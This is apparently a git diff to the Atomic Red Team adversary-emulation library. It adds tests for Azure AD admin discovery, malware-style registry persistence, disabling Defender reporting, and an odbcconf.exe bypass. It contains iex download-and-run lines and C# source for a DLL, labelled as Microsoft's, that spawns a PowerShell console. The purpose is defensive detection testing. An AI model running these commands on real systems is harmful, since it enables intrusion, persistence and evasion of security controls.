+##### Description: The SkyArk AzureStealth module must exist in $env:temp.
+##### Check Prereq Commands:
+```powershell
+if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+```
+##### Description: The AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+##### Description: The Az module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
+```
+
+
+
+
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index c315e097..65cb098b 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -274,3 +274,54 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause
name: powershell
+- name: Azure Security Scan with SkyArk
+ auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+ description: |
+ Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
+ Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
+ See https://github.com/cyberark/SkyArk
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: null
+ password:
+ description: Azure AD password
+ type: String
+ default: T1082Az
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ The SkyArk AzureStealth module must exist in $env:temp.
+ prereq_command: |
+ if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+ get_prereq_command: |
+ invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+ - description: |
+ The AzureAD module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ - description: |
+ The Az module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name Az -Force
+ executor:
+ command: |
+ Import-Module $env:temp\AzureStealth.ps1 -force
+ $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+ Connect-AzAccount -Credential $Credential
+ Connect-AzureAD -Credential $Credential
+ Scan-AzureAdmins -UseCurrentCred
+ cleanup_command: |
+ $resultstime = Get-Date -Format "yyyyMMdd"
+ $resultsfolder = ("Results-" + $resultstime)
+ remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 9e00c1d0..dd4a4e1a 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -114,7 +114,7 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
+| computer_name | Name of remote system to query | String | %COMPUTERNAME%|
#### Attack Commands: Run with `command_prompt`!
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 13c0e718..82169e55 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -35,7 +35,7 @@ atomic_tests:
computer_name:
description: Name of remote system to query
type: String
- default: $env:COMPUTERNAME
+ default: "%COMPUTERNAME%"
executor:
command: |
query user /SERVER:#{computer_name}
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 6b0a8033..ddf99829 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -86,6 +86,16 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #38 - Allow RDP Remote Assistance Feature](#atomic-test-38---allow-rdp-remote-assistance-feature)
+- [Atomic Test #39 - NetWire RAT Registry Key Creation](#atomic-test-39---netwire-rat-registry-key-creation)
+
+- [Atomic Test #40 - Ursnif Malware Registry Key Creation](#atomic-test-40---ursnif-malware-registry-key-creation)
+
+- [Atomic Test #41 - Terminal Server Client Connection History Cleared](#atomic-test-41---terminal-server-client-connection-history-cleared)
+
+- [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
+
+- [Atomic Test #43 - DisallowRun Execution Of Certain Application](#atomic-test-43---disallowrun-execution-of-certain-application)
+
@@ -1414,4 +1424,192 @@ reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetH
+
+
+
+## Atomic Test #39 - NetWire RAT Registry Key Creation
+NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #40 - Ursnif Malware Registry Key Creation
+Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c375558d-7c25-45e9-bd64-7b23a97c1db0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #41 - Terminal Server Client Connection History Cleared
+The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3448824b-3c35-4a9e-a8f5-f887f68bea21
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Must have the "MR9" Remote Desktop Connection history Key
+##### Check Prereq Commands:
+```powershell
+if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+```
+
+
+
+
+
+
+
+## Atomic Test #42 - Disable Windows Error Reporting Settings
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems
+encounter in specific application or process.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2c9e41e-cd86-473d-980d-b6403562e3e1
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #43 - DisallowRun Execution Of Certain Application
+Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it
+using security product.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 71db768a-5a9c-4047-b5e7-59e01f188e84
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+```
+
+
+
+
+
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 203dc8e7..c79367f9 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -604,3 +604,94 @@ atomic_tests:
reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /f >nul 2>&1
name: command_prompt
elevation_required: true
+- name: NetWire RAT Registry Key Creation
+ auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+ description: |
+ NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+ reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+ reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+ cleanup_command: |
+ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: Ursnif Malware Registry Key Creation
+ auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+ description: |
+ Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+ cleanup_command: |
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: Terminal Server Client Connection History Cleared
+ auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+ description: |
+ The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Must have the "MR9" Remote Desktop Connection history Key
+ prereq_command: |
+ if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+ New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+ executor:
+ command: |
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+ name: command_prompt
+ elevation_required: true
+- name: Disable Windows Error Reporting Settings
+ auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+ description: |
+ Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems
+ encounter in specific application or process.
+ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: DisallowRun Execution Of Certain Application
+ auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+ description: |
+ Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it
+ using security product.
+ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 22282127..8102cb77 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -83,7 +83,7 @@ Network Share Discovery using smbstatus
```bash
-smbstatus --shares
+sudo smbstatus --shares
```
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index 2303e376..d5304b29 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -43,7 +43,7 @@ atomic_tests:
sudo #{package_installer}
executor:
command: |
- smbstatus --shares
+ sudo smbstatus --shares
name: bash
elevation_required: true
- name: Network Share Discovery command prompt
@@ -131,4 +131,4 @@ atomic_tests:
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index 758dbec3..912c68f7 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -9,6 +9,8 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
- [Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-1---odbcconfexe---execute-arbitrary-dll)
+- [Atomic Test #2 - Odbcconf.exe - Load Response File](#atomic-test-2---odbcconfexe---load-response-file)
+
@@ -55,4 +57,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Odbcconf.exe - Load Response File
+Execute arbitrary response file that will spawn PowerShell.exe.
+Source files: https://github.com/woanware/application-restriction-bypasses
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rsp_file_name | Response file name to load | String | T1218.008.rsp|
+| rsp_file_path | Response file path | String | PathToAtomicsFolder\T1218.008\bin\|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+cd #{rsp_file_path}
+odbcconf.exe -f #{rsp_file_name}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+```
+
+
+
+
diff --git a/atomics/T1218.008/T1218.008.yaml b/atomics/T1218.008/T1218.008.yaml
index 5a7d6b34..662ff057 100644
--- a/atomics/T1218.008/T1218.008.yaml
+++ b/atomics/T1218.008/T1218.008.yaml
@@ -24,4 +24,34 @@ atomic_tests:
executor:
command: |
odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
+- name: Odbcconf.exe - Load Response File
+ auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+ description: |
+ Execute arbitrary response file that will spawn PowerShell.exe.
+ Source files: https://github.com/woanware/application-restriction-bypasses
+ supported_platforms:
+ - windows
+ input_arguments:
+ rsp_file_name:
+ description: Response file name to load
+ type: String
+ default: T1218.008.rsp
+ rsp_file_path:
+ description: Response file path
+ type: String
+ default: PathToAtomicsFolder\T1218.008\bin\
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+ prereq_command: |
+ if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+ executor:
+ command: |
+ cd #{rsp_file_path}
+ odbcconf.exe -f #{rsp_file_name}
+ name: command_prompt
diff --git a/atomics/T1218.008/bin/T1218.008.rsp b/atomics/T1218.008/bin/T1218.008.rsp
new file mode 100644
index 00000000..0e42d0b3
--- /dev/null
+++ b/atomics/T1218.008/bin/T1218.008.rsp
@@ -0,0 +1 @@
+REGSVR o.dll
\ No newline at end of file
diff --git a/atomics/T1218.008/bin/o.dll b/atomics/T1218.008/bin/o.dll
new file mode 100644
index 00000000..8b9d1a01
Binary files /dev/null and b/atomics/T1218.008/bin/o.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/Class1.cs b/atomics/T1218.008/src/odbcconf net.20/Class1.cs
new file mode 100644
index 00000000..e5abb7f9
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/Class1.cs
@@ -0,0 +1,77 @@
+// https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
+
+// odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using RGiesecke.DllExport;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+
+public class Test
+{
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllRegisterServer()
+ {
+ while (true)
+ {
+ AllocConsole();
+ IntPtr defaultStdout = new IntPtr(7);
+ IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+ Console.Write("PS >");
+ string x = Console.ReadLine();
+ try
+ {
+ Console.WriteLine(RunPSCommand(x));
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ }
+ return true;
+ }
+ //Based on Jared Atkinson's And Justin Warner's Work
+ public static string RunPSCommand(string cmd)
+ {
+ //Init stuff
+ Runspace runspace = RunspaceFactory.CreateRunspace();
+ runspace.Open();
+ RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+ Pipeline pipeline = runspace.CreatePipeline();
+
+ //Add commands
+ pipeline.Commands.AddScript(cmd);
+
+ //Prep PS for string output and invoke
+ pipeline.Commands.Add("Out-String");
+ Collection results = pipeline.Invoke();
+ runspace.Close();
+
+ //Convert records to strings
+ StringBuilder stringBuilder = new StringBuilder();
+ foreach (PSObject obj in results)
+ {
+ stringBuilder.Append(obj);
+ }
+ return stringBuilder.ToString().Trim();
+ }
+
+ public static void RunPSFile(string script)
+ {
+ PowerShell ps = PowerShell.Create();
+ ps.AddScript(script).Invoke();
+ }
+
+ private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+ [DllImport("kernel32.dll")]
+ private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+ [DllImport("kernel32")]
+ static extern bool AllocConsole();
+
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs b/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs
new file mode 100644
index 00000000..d1ecc173
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbcconf")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("Microsoft")]
+[assembly: AssemblyProduct("odbcconf")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("8346cf2d-dbdf-4ffd-a4dc-4d51f1d8d3b9")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj b/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj
new file mode 100644
index 00000000..d294f7c7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/odbcconf.csproj
@@ -0,0 +1,62 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}
+ Library
+ Properties
+ odbcconf
+ oc
+ v2.0
+ 512
+
+
+
+ true
+ full
+ false
+ bin\Debug\
+ DEBUG;TRACE
+ prompt
+ 4
+ x64
+
+
+ pdbonly
+ true
+ bin\Release\
+ TRACE
+ prompt
+ 4
+
+
+
+ packages\UnmanagedExports.1.2.7\lib\net\RGiesecke.DllExport.Metadata.dll
+ False
+ True
+
+
+
+ False
+ ..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln b/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln
new file mode 100644
index 00000000..f1afa906
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/odbcconf.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {8346CF2D-DBDF-4FFD-A4DC-4D51F1D8D3B9}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages.config b/atomics/T1218.008/src/odbcconf net.20/packages.config
new file mode 100644
index 00000000..9fa2d188
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages.config
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
